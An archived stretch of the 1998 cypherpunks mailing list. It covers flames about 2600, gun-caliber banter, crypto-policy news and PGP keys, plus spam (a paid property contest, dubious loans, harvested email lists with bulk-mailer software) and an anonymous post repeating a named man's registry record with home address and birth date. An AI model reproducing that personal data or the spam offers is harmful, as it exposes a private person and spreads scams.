> just said what I knew, ie. gave my opinion (even if I am a newbie), which is
> something you obviously don't like.  Perhaps you didn't read (sic) that I
> kept using "I think", "I believe", "I guess", etc. instead of "I STATE".
Perhaps you didn't read the 411 for the PGP-Mailing-List. I don't recall
it saying "Ask unrelated questions if your a newbie." IMO anyone
interested in "2600" groups can find 411 all over the www.
also there are alt.2600 newsgroups, as well as other places. I personally
wouldn't even mind if you kept it off the list and asked if I knew what
2600 is, but trying to "teach" ppl what you "think" 2600 is.. has no place
on this mailing list.

> >...with any "group" nowadays, there is a FAQ avaliable for
> >newbies etc (obviously like yourself).
> ... others just know ever since... never were newbies, hey?
You don't know how to read?

> >They are not "supposedly hackers and phreakers". Aso the
> >debatable issure of exact translation of a hacker, IMO it
> >is anyone that has altered ANY program.
> The issue of exact translation should be, perhaps, discussed on a grammar,
> language, or else mailing list if it is to start a flame.
I have no interest in starting a flame, you have embarrased yourself well
enough.

> >p.s. If it wasn't for hackers, you wouldn't have the
> >technology you have.
> If it wasn't for you... am I in front of a top developer or similar?  Sorry,
If I simply wrote the 2600 faq (which I didnt) it would have bettered
society, because idiots would have an idea what it is.

> I didn't notice, all I can see is a squared 14'' screen.
Well, obviously you stumbled upon a keyboard as well, prematurely perhaps.

> >OH what you've read on the beloved www. I'd imagine you
> >read an article on a webpage full of sex ad banners as
> >well. I don't feel that I am an "outlawed hero" but I feel
> >I better society in various ways.
> You see, you just imagine (as I "guessed, believed,..."), and that's a good
> thing (even imagining with a sick mind...
> sex add banners?).  As for bettering society... how? trying to scare people
> away so that you are THE ONE with the know-how?
I'm not trying to "scare you away". (you'd know if I was "trying"). 

> 
> >As I've already said, you have alot more reading to do.
> I'm sure if we ever get to meet each other, you'll teach me a lot and
> perhaps lighten me... meanwhile, I'll just try to learn away from those like
> you, I'll leave psycotic tales for others, if you don't mind me to.
I'll help you with anything I can, off-list. In the meantime, read.

> I never said or stated hackers or the like are to be prosecuted or else,
> never tried to raise a moral nor
> ethical argument about, I just posed a question on (personal) security.
Pretending you have an idea on what 2600 is not related to security.
(Although the 2600 group irnoically does).


> Most of all I DID NOT try to raise a flame by annoying anyone.  If you are
> up to it, or if you believe you are Robin Hood (or Rob Hack for this
> matter), I don't give a monkey about it, just visit your psychiatrist, or
> talk to a priest/ess if you have a religion, or wait for the green people to
> come fetch you up.  As I've just said, I won't get involved on a flame with
> you, so don't bother to answer, I won't do it at all.
Perhaps if you reply off-list or try stop trying to pull your head out of
toilet, I'll leave you alone.
> 

> I apologize to others on this list for this, but I felt I had to answer once
as all newbies do.

> (no more, promised).
promise?

> 
> 
> H. Menezo Ganau
> homega@vlc.servicom.es
> homega@latinmail.com
> 
> 
> DH/DSS  (1024/1024)
> Key ID:  0x614DB9FA
> 
> RSA (2048)
> Key ID:  0x160B1B5B
> 

- -shareware email coutesy of yashy- -send $10 cdn funds if you read it-
email@reply     irc@ircnet #italy     icq@4497826    pgpID@ 0xD0186E85
pubring@www.chat.carleton.ca/~nmarion   home@ottawa canada   sleep@7am
- -                                                                    -
     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNStBoT8rI+jQGG6FAQERswP9E+9LM1fzlMQWAMyUiDjq+n//37jEmTfl
VUR5LhdPSwCf1zF7sBe+WVHvHSYWVJ5/0K/mu/j7htmb2rL6PqwcP8OyjLxQo6/M
4N/7WAI7vtsojLP5ubqoPHnx5eBgPRPF7vIRDuhw7Br0KflqFaSPeL8H2rPBWXNl
YR5H1r5OAjg=
=d5s8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 8 Apr 1998 05:24:14 -0700 (PDT)
To: alt1@snowhill.com (Al Thompson)
Subject: Re: Cost of Ak manufacture
In-Reply-To: <199804080912.EAA20228@frost.snowhill.com>
Message-ID: <199804081221.HAA18238@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Al Thompson wrote:
> At 11:20 PM 4/7/98 -0500, Igor Chudov @ home wrote:
> >Judging by their construction, there is not a lot of costs and they
> >should be a lot cheaper than AR-15s (against which I have almost nothing).
> >
> >So, the question is, it is realistic to expect that AK s will be
> >manufactured here? Will the control freaks be able to stop it?
>   
> Two major problems.  There is VERY little domestic manufacture of 7.62x39
> ammo, and most of what is already out there is not reloadable.  Even if AK
> clones became widespread, all the feds would have to do would be to ban the
> import of the ammo.
>  
> Secondly, while it would certainly be possible for a manufacturing facility
> to construct an AK from raw materials, if "push comes to shove," it would be
> much faster and cheaper for people to "reconstruct" the Sten parts they have
> laying around.  This has the added advantage that ammo is readily available
> for those.
>  
> While 7.62x39 might become hard to find, the common US military and NATO
> calibers (7.62NATO, 5.56, and 9mm) will be widely available.

Al, you can make AKs in .223. There is no problem with that. So your
objection is valid, but not insurmountable.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winahouse23@usa.net
Date: Thu, 9 Apr 1998 13:57:11 -0700 (PDT)
To: mailer345@usa.net
Subject: WIN US$1,000,000 'BELMOR HOUSE'
Message-ID: <199802045346.GAK09957@usa.net>
MIME-Version: 1.0
Content-Type: text/plain


		WIN US$1,000,000 'BELMOR HOUSE'
		FOR JUST US$20 VIA THE INTERNET


For just US$20 there is a chance to scoop the fabulous prize of 'Belmor
House' - a US$1,000,000 FREEHOLD property in Oxford, England.

Entrants need not "want a house" in Oxford in order to ENTER AND BENEFIT from
this Contest as the Winner can SELL the US$1,000,000 HOUSE or RENT IT out for
a FIVE FIGURE yearly INCOME, or use it as a SECOND HOME.

The Winner gets the house mortgage-free with clear title and does not pay any
closing costs . . .  and the US$1,000,000 house is the Winner's to do with, as
the Winner wishes.  BUT TO WIN IT YOU NEED TO ENTER the Contest . . .

Entrants can download Entry Form, Contest Rules, Drawings, Photographs and
Read all about Edwardian 'Belmor House', in historic beautiful Oxford by
entering:

	            http://www.win-a-property.com/

The idea is to RAISE MONEY for CHARITY by giving away all profits after the
deduction of the property value and costs.  The Entry Fee is non-refundable
as after costs the money raised is all donated to Charity.

This is the FIRST TIME EVER that on a worldwide basis a US$1,000,000
beautiful Edwardian property in Oxford, England has been offered on the
Internet as the prize in a Contest, which is valid where not prohibited by law, and may herald the start of a new trend to 'sell' property through the Internet.

To win 'Belmor', a 13-room five bathroom Edwardian house in prestigious
residential central north Oxford, Entrants need to:

	1.  Key in 50-to-75 words in English on
		"Why The Entrant Needs The House"
	2.  Key in full name and address
	3. Select payment of Entry Fee of US$20 on any
		 major credit card and press
		the button to send the Entry by email or by fax.

It is as easy as that on the Internet.

'Belmor House' has been valued unfurnished at US$1,000,000 by internationally
renowned estate agents, Savills.

The Winner of this US$1,000,000 house will be the Entrant whose Entry,
in the opinion of an independent panel of judges, is interesting, personal
and persuasive, telling "Why The Entrant Needs The House".

The Freehold property is the only prize.  There is no cash alternative.

Not a lottery or a raffle, the Contest has been structured by Solicitors from
London as a skill competition to comply with British law under the Lotteries
and Amusements Act 1976 and the British Codes of Advertising and Sales
Promotion.  A firm of Chartered Accountants is monitoring the Contest.  The
Contest money is being held in a special bank account and cannot be touched
until the close of the Contest.

Closing date is 30th June 1998 and the Winner will be announced on the
27th July 1998 on our website.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 8 Apr 1998 21:34:48 -0700 (PDT)
To: ichudov@algebra.com
Subject: Re: Cost of Ak manufacture
In-Reply-To: <199804081221.HAA18238@manifold.algebra.com>
Message-ID: <Pine.BSF.3.91.980408102115.28363B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> > >So, the question is, it is realistic to expect that AK s will be
> > >manufactured here? Will the control freaks be able to stop it?
> >   
> >  
> > While 7.62x39 might become hard to find, the common US military and NATO
> > calibers (7.62NATO, 5.56, and 9mm) will be widely available.
> 
> Al, you can make AKs in .223. There is no problem with that. So your
> objection is valid, but not insurmountable.
> 
> 	- Igor.

Or make AK's in 7.62 NATO. As I recall, there was an AK variant 
(Valmet??) available in 5.56 NATO and 7.62 NATO years ago.

-OrdnanceMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@goodnews.idx.biz
Date: Wed, 8 Apr 1998 07:42:10 -0700 (PDT)
To: info@goodnews.idx.biz
Subject: CASH AVAILABLE / ANY PURPOSE
Message-ID: <199804081437.KAA05439@efni.com>
MIME-Version: 1.0
Content-Type: text/plain


INSTANT CASH FINANCING          UP TO  $10 MILLION

Our network of financial sources has money to lend  NOW...for any purpose.

BUSINESS STARTUP / PURCHASE

135 % MORTGAGE FINANCING/REFINANCING AND HOME IMPROVEMENT MONEY 

EQUIPMENT AND AUTO LEASING
     
DEBT CONSOLIDATION     

NO INCOME VERIFICATION   

CREDIT PROBLEM ? NO PROBLEM !  FAST PROCESSING .
     
LOW RATES AND GREAT TERMS AVAILABLE NOW SO CALL TODAY: ( NO E-MAIL )

INTERBANK 201-487-2694






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 8 Apr 1998 09:09:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: IMPORTANT: Gary L. Burnore is a Sex Offender!
In-Reply-To: <6gduj4$61g@basement.replay.com>
Message-ID: <199804081609.SAA05934@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Camille Klein <godmom@nina.pagesz.net> wrote:

> In triangle.general Information Security <The@NSA.sucks> wrote:
>        
> : Someone Vulis can actually call "pedophile child molester"
> : and be accurate???
>    
> No.
>    
> I won't go into the details, but effectively it's a load of bullshit that
> unfortunately is being used to cause Gary Burnore some real problems.  I
> have to agree with Hank on this--IF it's at all possible, I hope he can
> have some legal recourse.

I visited the http://sbi.jus.state.nc.us/sor/ website, did a search for
"Gary Burnore", and the story is confirmed.  If it were a "load of
bullshit", I suspect that Gary would have had it hauled away by now.
There's even a mugshot there.  Gary Burnore, of course, is welcome to
post his side of the story if he cares to.

The date listed for his conviction is about the same time that Gary Burnore
was whining about some "anon asshole" whom he alleged had falsely accused
him of molesting his live-in girlfriend's teenage daughter.  She lived --
guess where -- in Santa Clara, CA.  It looks like Gary's rampage to get a
couple of anonymous remailers shut down for spreading "libel" was bogus.
If a story is true, it isn't libel.  And when he couldn't get them to censor
embarassing posts to usenet, the made-to-order "spam baiting" mysteriously
appeared, and finally finished the job.  Just a coincidence, I suppose...

Let me guess -- this "conspiracy" to make Gary Burnore look bad has now
infiltrated the Santa Clara Police Dept., the San Francisco Police Dept.,
and the North Carolina attorney general's office?

By definition, Gary Burnore is innocent of ANYTHING he's accused of. <g>
And since this is the same Gary Burnore who was so adamant that posting
publicly-available information to usenet was acceptable:

   Registration Status: Registered
   Possible Violations: None Reported
   BURNORE,GARY LEE 
   Alias Names:
   BURNORE,GARY LEE
   
                                         Photo Date: 08-27-1997
                                              SRN: 001693S3
   
   Reported Date: 12-16-1997 Address Verified: NO
   Street: 4201 BLAND ROAD APT J
   City: RALEIGH State: NC Zip: 27609 County: WAKE
   
   Race: W Sex: M Height: 5'08" Weight: 170 LBS. Hair: BRO Eyes: BLU
   Birth Date(s): 10-13-1957
   Scars, marks, tattoos: 
   State ID #: FBI #: Dept. Corr. #: 
   
   Contact County: WAKE Registration Date: 08-27-1997
   Conviction Date: 03-13-1997 Release Date: 
   NC Statute: 14-202.1 - INDECENT LIBERTY MINOR
   Sentence Imposed: PROBATION: 3Y
   Court County: - SANTA CLARA, CA
   
   Reported Date: 08-27-1997 Address Verified: NO
   Street: 4201 BLAND ROAD
   City: RALEIGH State: NC Zip: 27609 County: WAKE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Apr 1998 16:31:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CIA Joins MCC
Message-ID: <199804082331.TAA16075@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a recent notice that the CIA has become an
associate member of the Microelectronics and Computer 
Technology Corporation <www.mcc.com>, the research 
consortium of several high-tech firms located in Austin. 
The notice also lists a project there called "InfoSleuth." 
See the notice (among other national security 
opportunities) at:

   http://jya.com/nso040898.htm

A reporter working on the story has asked for any information
on the CIA enrollment and InfoSleuth. Send it to her, or
to me if a cut-out is needed:

Heather Harreld, senior reporter covering security at
Federal Computer Week in Washington.

heather@fcw.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Apr 1998 16:54:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cell Phones of State
Message-ID: <199804082354.TAA31840@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The State Dept Press Briefing today:

   MR. RUBIN:  I'm sorry I didn't come earlier, and I didn't 
   know that cell phones were permitted in the briefing room, 
   but I guess they are. Remember that phrase "cell phones", 
   it will come back in the next 24 hours.

Nothing else about it during the briefing. Curious, unless it refers
to the Senate's approval on April 1 of S.493, The Wireless 
Telephone Protection Act, which incorported amendments 
by the House of HR 2460, and that Clinton is expected to
sign it shortly.

Still, maybe State is going to announce something more
dramatic about SIGINT.

See S.493:

   http://jya.com/s493.txt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Apr 1998 17:22:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MCC Projects
Message-ID: <199804090022.UAA24087@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


MCC's InfoSleuth 1 and 2, as well as a host of
intriguing intelligence, surveillance and lots of
prying, hiding, and TA projects are listed and 
linked at:

   http://www.mcc.com/projects/government.html

The IC booty is plentiful in Austin, hooray for the
cpunks there. Time for an international get together
deep in the heart of Tejas.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com
Date: Wed, 8 Apr 1998 20:23:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: House Democrats, ACLU criticize Clinton on crypto stand
Message-ID: <v04011212b151ec1f76bb@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


There is some value in having a 900-pound software industry gorilla like
NAI pushing at the foolishness of current export policy in a 100% legal
way: it demonstrates to more and more of the citizenry (and business
leaders with influence) just how empty, archaic and damaging to US
interests that the current policies are.

It also gives Loyal Members of the Opposition such as the House Demo's and
the ACLU ample "ammunition" (excuse the expression) to discuss the details
of said Administration foolishness in full public view.

[ Excerpts below from ACLU's CYBER-LIBERTIES UPDATE 7 April 98           ]
[ for more details, see <http://www.aclu.org/issues/cyber/updates.html>  ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
House Democrats Criticize Clinton Position on Encryption

Twelve Democratic members of Congress last week sent a letter to President
Clinton telling him that they "strongly support legislation that would
substantially reform the Administration's export restrictions on
American-made encryption products."

The letter further states that the members are not satisfied with the
Administration's decision to attempt to resolve the current impasse on its
position on encryption by holding meetings with industry rather than
through legislation.

The letter also criticizes the administration's position on encryption
requiring strict restrictions on export of encryption programs despite the
widespread global availability and the impact of such restrictions on
privacy and commerce.

The letter further states:

Two developments in only the last two weeks illustrate the futility in
banning encryption's export or use. Network Associates, the nation's
largest independent maker of computer security software, has announced that
its Dutch subsidiary will sell an international version of its strongest
encryption program. In addition, an MIT scientist, Ronald Rivest, has just
proposed a new technique for securing computer files and communications,
called "chaffing and winnowing," which doesn't involve encryption at all.

The point is that the Administration can hardly control the proliferation
or direction of technology in the digital age. Consequently, the
discussions with industry will succeed only if the Administration commits
itself in these discussions to a major overhaul of its current export
policies and to policies that do not mandate or compel domestic controls on
encryption. Rather, government should recognize that in the coming decades
the protection of our nation's critical infrastructure and national
security interests demand foremost that American industry retain its global
leadership in the digital arena. A strong domestic high-tech industry -- in
cooperation with national security agencies and law enforcement officials
which have been granted sufficient resources by our government for meeting
the challenges of the digital age -- is the foremost priority for ensuring
American security and global leadership in the Information Age."

The letter was signed by the following Members of Congress:

Richard A. Gephardt, M.C.
Zoe Lofgren, M.C.
Vic Fazio, M.C.
Martin Frost, M.C.
Sam Gejdenson, M.C.
John Conyers, Jr., M.C.
Edward J. Markey, M.C.
Anna G. Eshoo, M.C.
Rick Boucher, M.C.
Calvin M. Dooley, M.C.
James P. Moran, M.C.
Adam Smith, M.C.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ACLU Report Challenges Clinton Scare Tactics on Encryption

Charging that the Clinton Administration is using scare tactics to acquire
vast new powers to spy on all Americans, the ACLU has begun circulating a
white paper on the escalating battles over wiretapping in the digital age
to key members of Congress.

The new ACLU report -- Big Brother in the Wires -- says that the current
struggle over cryptography policy holds far-reaching and possibly
irrevocable consequences for all Americans. It makes an impassioned case
for limiting the government's ability to seize and review private
communications -- whether they are telephone conversations, FAX messages,
electronic mail, electronic fund transfers or medical records -- by
permitting the use of strong encryption.

The report comes as Congress grapples with fundamental disagreements over
encryption policy. On one side of the policy impasse are the law
enforcement and national security agencies -- the Justice Department, the
FBI, the National Security Council, the Drug Enforcement Agency and many
state and local agencies. On the other side are the communications
industry, the country's leading cryptographers and computer scientists and
civil liberties and privacy advocates.

"We are now at an historic crossroads," the report says. "We can use
emerging technologies to protect our personal privacy, or we can succumb to
scare tactics and to exaggerated claims about the law enforcement value of
electronic surveillance and give up our cherished rights, perhaps forever."

"If President Clinton and federal law enforcement authorities have their
way, new technology will make possible a much more intrusive and omniscient
level of surveillance than has ever been possible before," said ACLU
Legislative Counsel Gregory T. Nojeim. "Congress must reject this blatant
power grab and keep Big Brother out of our wires."

The ACLU report can be found at:
http://www.aclu.org/issues/cyber/wiretap_brother.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 -end excerpts-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CJ Parker" <sonofgomez@hotmail.com>
Date: Wed, 8 Apr 1998 20:40:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CoE/AoD Notice!
Message-ID: <19980409034001.16032.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject: 
            CoE/AoD Notice
       Date: 
            Wed, 08 Apr 1998 21:12:14 -0600
       From: 
            TruthMonger <tm@dev.null>
Organization: 
            "It's not FUD until *I* say it's FUD!"
         To: 
            bianca@dev.null
        CC: 
            cypherpunks@toad.com


Toto's computers were seized today by RCMP and Canadian Customs.

All communications with him, past, present and future, should be 
considered compromised.

Reroute the legal information, etc., that he requested Monday to
the sonofgomez address.

The good news is...he figured out where the 'yellow wire' goes...

TruthMonger709

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Waters <waters@ultimateprivacy.com>
Date: Wed, 8 Apr 1998 20:12:26 -0700 (PDT)
To: heather@fcw.com
Subject: Re: CIA Joins MCC
In-Reply-To: <199804082331.TAA16075@camel7.mindspring.com>
Message-ID: <3.0.5.32.19980408221019.007ef290@onetimepad.com>
MIME-Version: 1.0
Content-Type: text/plain



You will need to verify these facts.
I believe that the InfoSleuth project was the code name for InfoGlide a
data-mining startup currently located in the mcc building. 

They create advanced databases for fraud prevention and law enforcement
applications. 

http://www.infoglide.com

Call David Wheeler, founder of the company to verify the InfoSleuth connection
512-305-0267 

At 07:32 PM 4/8/98 -0400, John Young wrote:
>There's a recent notice that the CIA has become an
>associate member of the Microelectronics and Computer 
>Technology Corporation <www.mcc.com>, the research 
>consortium of several high-tech firms located in Austin. 
>The notice also lists a project there called "InfoSleuth." 
>See the notice (among other national security 
>opportunities) at:
>
>   http://jya.com/nso040898.htm
>
>A reporter working on the story has asked for any information
>on the CIA enrollment and InfoSleuth. Send it to her, or
>to me if a cut-out is needed:
>
>Heather Harreld, senior reporter covering security at
>Federal Computer Week in Washington.
>
>heather@fcw.com
>
>
>
Bryan Waters                      http://www.ultimateprivacy.com
Director of Marketing             Voice: 512-305-0505
Ultimate Privacy Corporation      Fax: 512-305-0506




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CJ Parker" <sonofgomez@hotmail.com>
Date: Wed, 8 Apr 1998 23:35:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I Broke PGP...sorry!
Message-ID: <19980409063426.8597.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Business Security 5.5

mQENAzUsawIAAAEIALd/93zizbBbg8LsUmcilJaRChmdfClAFkgxWvzNFQw4H24V
hvXjpQOT1VHVHeqvDZ22gTfFlg16BFss/Cf8WkDk/l+4alAILKjrauiXNmvj1Oq3
qIZNVST7auJGzOVyt7s5o6PIMOBBemolEIcgBjTuAEo4EiiDh2UiU2A8WNAP6A81
fAPgB2HqMoNIujey0vPkban8Mea9oSVgxqEPHUYCGczV6xYau9m6NKpjWU8wu5JQ
Sap//fVXjBmOu2aHrhfHgz82lqNChzt3lwOlv8U4bREUckkIbxYEbf6fAx3+kwue
Q1aRXMQEG42FMhBe9c3GfWuYh7NKrR6IQFPy8pEABRG0I0xhc3QgQ2FuYWRpYW4g
T3V0bGF3IDxsY29AZGV2Lm51bGw+iQEVAwUQNSxrAq0eiEBT8vKRAQEdMQf/XvsJ
UOuPaesYiA2T1sOjEsXcUNQxZxjibDBJzy5/fMRWhCF9rWz1EwUNTCOypMZfQQ8T
3LcGXJkTk9UrgbpS0YNtAPbgXS74wzElGqMRdlOvCZN4MkcIOa5beNg2ZaBo53uY
UPkS2GQ2uaRqn1rLMvfKdRQl2AnTYyd19OFarb3qpBe7movwrmbB7s8nArCSrrmr
pWgQ7ILbPDB2GkjwLjS2f3lMoTMGODvCVzTjG0hx/9VYTwZ+m/68u4m6vDRAGoc8
PLNCHQ8/I3wDPuQKl0tZ2E31g0dYiaga/vUFV0raTRyju73caKFL1vo6SDVx83Mg
+TNc+xULb9gKW23cug==
=/Po2
-----END PGP PUBLIC KEY BLOCK-----


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 8 Apr 1998 22:00:18 -0700 (PDT)
To: wombat@mcfeely.bsfs.org (Rabid Wombat)
Subject: Re: Cost of Ak manufacture
In-Reply-To: <Pine.BSF.3.91.980408102115.28363B-100000@mcfeely.bsfs.org>
Message-ID: <199804090458.XAA25250@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Rabid Wombat wrote:
> > > >So, the question is, it is realistic to expect that AK s will be
> > > >manufactured here? Will the control freaks be able to stop it?
> > >  
> > > While 7.62x39 might become hard to find, the common US military and NATO
> > > calibers (7.62NATO, 5.56, and 9mm) will be widely available.
> > 
> > Al, you can make AKs in .223. There is no problem with that. So your
> > objection is valid, but not insurmountable.
> > 
> 
> Or make AK's in 7.62 NATO. As I recall, there was an AK variant 
> (Valmet??) available in 5.56 NATO and 7.62 NATO years ago.
> 

Yugoslavian AKs were in .308. I've seen those, they are slightly bigger
than the regular aks. There are some chinese guns in 5.56.

Anyway, caliber is not a problem and not an issue. The issue is
possibility of producing cheap reliable fun guns for the general public.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Thu, 9 Apr 1998 00:21:00 -0700 (PDT)
Subject: 40 MILLION EMAIL ADDRESSES LOW PRICE !!!
Message-ID: <199804090720.AAA05265@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


40 MILLION EMAILS FOR SALE  super low price!

Our Fresh Addresses Will Bring You 
Incredible Results!


http://207.93.198.154/webhost

If you REALLY want to get the word out regarding
your services or products, Bulk Email is the BEST 
way to do so, PERIOD! Advertising in newsroups is 
good but you're competing with hundreds even THOUSANDS
of other ads. Will your customer's see YOUR ad in the 
midst of all the others?

Bulk Email will allow you to DIRECTLY contact your
potential customers. They are much more likely to
take the time to read about what you have to offer 
if it was as easy as reading it via email rather
than searching through countless postings in 
newsgroups.

There is a secret to effective Bulk Email...HIGH
QUALITY LISTS! There are SO many companies offering 
bulk email lists that are months old and it's not
uncommen for HALF of those addresses to be outdated
and undeliverable. Also, most companies offer lists
that they have compiled from addresses extracted from
newsgroups, THE WORST PLACE TO GET ADDRESSES FROM!

Why? Simple, most people that post messages in news-
groups KNOW that their addresses might be extracted
so they use FAKE addresses resulting in undeliverable
messages.

You can now get FRESH, HIGH QUALITY lists of addresses
that have NOT been extracted from newsgroups! Our lists
are compiled of addresses that we have extracted from 
member directories and help forums where you CAN NOT
use fake email addresses! Also, our lists are LESS than
1 month old and are CONSTANTLY updated to remove dupes
and undeliverables! 

Our emails can be downloaded at a web site or be shipped to your home in disks.  Our emails are in text 
form, one line per email.  This form is compatible with Pegasus, Eudora, Microsoft email programs, and many 
other popular email softwares. 

We believe that if you have a great product or service for everyone, you should let everyone know.  Do it 
cost effectively today!  Sending emails doesn't cost you one cent!  In just one night, millions of people will 
know about your company or your corporation.  Market your company by reaching 40,000,000 (40 million) 
fresh customers for only $79.00!!!!


Special Sale!  Buy the 40 Million email addresses today and receive Email Platinum Professional Version 
FREE! Email Platinum Pro is 4 programs in one!  (This message is sent by Email Platinum.  You can too send 
out mass sales letters professionally.)

Email Platinum is an extremely fast mass emailer (150,000 emails per hour with modest Pentium) that does 
four things:

1) Collects email addresses from newsgroups, web sites, or from AOL member files by key words and by 
specific interests.
2) Mail out your sales letters with automated friendly addressing (example: Dear John, Dear Nancy, etc.) 
Ramdomizes from and to field.  One push of a button does it all. Guarantee no cut and paste.
3) Have capability to remove email addresses of people who don't like emails.
4) Post your sales letters to THOUSANDS OF NEWSGROUPS WITH A PUSH OF A BUTTON --- within HALF 
AN HOUR!!

Email Platinum and Email Addresses are your best sales tools! If you have a good product, you will be rich in 
no time.

Call today (415)585-3825.  All for $79. Not a penny extra.

Call today (415)585-3825.  Technical support available 24 hours. Emails are updated regularly. 

We can accept Visa or Master Card. 


http://207.93.198.154/webhost

Or, simply print this form and fill it out.  Mail it along with $79 check or money order to:

Alex Chiu
PO BOX 16547
San Francisco CA  94116
(415) 585-3825

Upon the receipt of your payment, you will immediately be instructed via email or by phone on how to 
download the fresh email addresses.


Name: _________________________________

Address: ________________________________________

_________________________________________________

Telephone number: ___________________________

Email address: ______________________________

-----------------------------------------------------

------------------------------------------------------

Don't want to email millions of people yourself?  No problem.  I can do it for you professionally!  I mail out two 
million emails for you within 3 days for $129!!  Tell me what kind of customer you would want, and I will set 
the target with my highly targeted list.  A mere $129 service includes:

Email two million people. (targeted prospects)
Post advertisement on 2000 newsgroups.
telephone recommendations and technical support on how to make money on the internet.

I guarantee you this is a great way to start your own company on the internet.  Few months later, you will 
be like me making $5000 a month with internet!  Call (415) 585-3825 if you have any question.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Thu, 9 Apr 1998 00:33:39 -0700 (PDT)
Subject: Adult CD
Message-ID: <199804090733.AAA20402@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you interested in ADULT Cd-ROMs we would like to give you 2 FREE sampels, se more about this                
great offer at :
http://www.vicom.dk/
No obligations at all ! !  - just a nice offer from Denmark.

This is a one time offer - if you are not interested you will not hear from us again.
VICOM






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CJ Parker" <sonofgomez@hotmail.com>
Date: Thu, 9 Apr 1998 00:38:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: LCO
Message-ID: <19980409073751.796.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Business Security 5.5

mQENAzUsawIAAAEIALd/93zizbBbg8LsUmcilJaRChmdfClAFkgxWvzNFQw4H24V
hvXjpQOT1VHVHeqvDZ22gTfFlg16BFss/Cf8WkDk/l+4alAILKjrauiXNmvj1Oq3
qIZNVST7auJGzOVyt7s5o6PIMOBBemolEIcgBjTuAEo4EiiDh2UiU2A8WNAP6A81
fAPgB2HqMoNIujey0vPkban8Mea9oSVgxqEPHUYCGczV6xYau9m6NKpjWU8wu5JQ
Sap//fVXjBmOu2aHrhfHgz82lqNChzt3lwOlv8U4bREUckkIbxYEbf6fAx3+kwue
Q1aRXMQEG42FMhBe9c3GfWuYh7NKrR6IQFPy8pEABRG0I0xhc3QgQ2FuYWRpYW4g
T3V0bGF3IDxsY29AZGV2Lm51bGw+iQEVAwUQNSxrAq0eiEBT8vKRAQEdMQf/XvsJ
UOuPaesYiA2T1sOjEsXcUNQxZxjibDBJzy5/fMRWhCF9rWz1EwUNTCOypMZfQQ8T
3LcGXJkTk9UrgbpS0YNtAPbgXS74wzElGqMRdlOvCZN4MkcIOa5beNg2ZaBo53uY
UPkS2GQ2uaRqn1rLMvfKdRQl2AnTYyd19OFarb3qpBe7movwrmbB7s8nArCSrrmr
pWgQ7ILbPDB2GkjwLjS2f3lMoTMGODvCVzTjG0hx/9VYTwZ+m/68u4m6vDRAGoc8
PLNCHQ8/I3wDPuQKl0tZ2E31g0dYiaga/vUFV0raTRyju73caKFL1vo6SDVx83Mg
+TNc+xULb9gKW23cug==
=/Po2
-----END PGP PUBLIC KEY BLOCK-----


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CJ Parker" <sonofgomez@hotmail.com>
